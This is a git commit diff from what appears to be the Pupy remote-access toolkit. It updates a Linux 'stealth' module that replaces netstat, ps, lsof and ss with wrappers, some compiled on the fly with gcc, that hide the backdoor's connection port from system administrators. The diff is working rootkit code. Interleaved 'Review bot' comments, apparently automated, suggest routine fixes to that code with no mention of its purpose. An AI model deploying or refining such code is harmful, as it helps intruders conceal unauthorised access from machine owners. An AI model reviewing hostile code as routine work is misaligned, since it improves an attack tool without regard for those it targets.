Merge branch 'RedSunEmpire-master' into dev

n1nj4sec 2016-05-03 18:13:10 +02:00
commit 5d72cfaac5
2 changed files with 54 additions and 48 deletions


@ -1,31 +1,23 @@
#!/usr/bin/env python #!/usr/bin/env python
from pupylib.PupyModule import * from pupylib.PupyModule import *
from pupylib.utils.rpyc_utils import redirected_stdio
__class_name__="SetStealth" __class_name__="SetStealth"
def print_callback(data):
sys.stdout.write(data)
sys.stdout.flush()
@config(cat="manage", compat="unix") @config(compat="linux", cat="manage")
class SetStealth(PupyModule): class SetStealth(PupyModule):
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
Demo: https://vimeo.com/157356150"""
********************** /!\ WARNING /!\ ********************** dependencies=["linux_stealth"]
* Do NOT run the stealh module more than ONCE on a machine. *
* Running it two times will brake the binaries. *
*************************************************************
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.') self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
def is_compatible(self):
a,r=super(SetStealth, self).is_compatible()
if not a:
return False, r
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
return False, "It looks like this module has already been run on this machine."
return True, ""
def run(self, args): def run(self, args):
self.client.load_package("linux_stealth") with redirected_stdio(self.client.conn):
self.client.conn.modules['linux_stealth'].run(str(args.port)) self.client.conn.modules['linux_stealth'].run(args.port)
self.success("Module executed successfully.") self.success("Module executed successfully.")
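Review bot: The new `--port` option in init_argparse drops the `type=int` the old positional argument had, so `args.port` now reaches `linux_stealth.run` as an unvalidated string (or None) instead of a checked integer; restoring `type=int` and converting at the call site keeps the old behaviour, e.g. `self.arg_parser.add_argument('--port', type=int, default=None, help='The port number to which Pupy is connecting to.')` with `port = str(args.port) if args.port is not None else None` before the `.run(...)` call. The class docstring also still reads "runnin process"; it should be `Hides the running process from netstat, ss, ps, lsof by using modified binaries.`.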


@ -1,36 +1,50 @@
#!/usr/bin/env python #!/usr/bin/env python
import os import sys
import subprocess import subprocess
import os
import time import time
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def run(port): def run(port=None):
if cmd_exists("gcc") == True: if port is None:
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" try:
#subprocess.call(bash, shell=True) import pupy
with open('/tmp/b', 'w') as f: host, port=pupy.get_connect_back_host().split(":")
f.write(bash) except:
os.system("bash /tmp/b") raise Exception("pupy connect back port couldn't be found, please precise it manually")
time.sleep(3)
os.remove("/tmp/b") print "hidding port %s ..."%port
else:
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" a=subprocess.check_output(["netstat", "-tn"])
with open("/tmp/p", "w") as f: if port in a:
f.write(bash) def cmd_exists(cmd):
os.system("bash /tmp/p") return subprocess.call("type " + cmd, shell=True,
time.sleep(3) stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
os.remove("/tmp/p") if cmd_exists("gcc") == True:
bashss="""#!/bin/bash bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
with open('/tmp/b', 'w') as f:
f.write(bash)
f.close()
os.system("bash /tmp/b")
time.sleep(3)
os.remove("/tmp/b")
else:
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
with open("/tmp/p", "w") as f:
f.write(bash)
f.close()
os.system("bash /tmp/p")
time.sleep(3)
os.remove("/tmp/p")
bashss="""#!/bin/bash
/bin/zss $* | grep -v """+port /bin/zss $* | grep -v """+port
get_ss_path=subprocess.check_output('which ss', shell=True) get_ss_path=subprocess.check_output('which ss', shell=True)
path=get_ss_path[:-3] path=get_ss_path[:-3]
os.system("mv "+path+"ss "+path+"zss") os.system("mv "+path+"ss "+path+"zss")
with open(path+"ss", "w") as newss: with open(path+"ss", "w") as newss:
newss.write(bashss) newss.write(bashss)
os.system("chmod +x "+path+"ss") newss.close()
#blazo - fresh orange os.system("chmod +x "+path+"ss")
#brock - september 22nd else:
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ print "port is already hidden"
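Review bot: The bare `except:` in run() around `import pupy` and the `split(":")` swallows every exception, including SystemExit and KeyboardInterrupt, and hides the real cause behind a generic message; it should be narrowed to `except (ImportError, ValueError, AttributeError):`, and the message wording `please precise it manually` reads as "please specify it manually". The explicit `f.close()` and `newss.close()` calls inside the `with` blocks are redundant because the context manager already closes the file on exit. `cmd_exists` is now re-defined inside the `if port in a:` branch on every call, where the module-level helper the old side had is clearer; `print "hidding port %s ..."` also misspells "hiding".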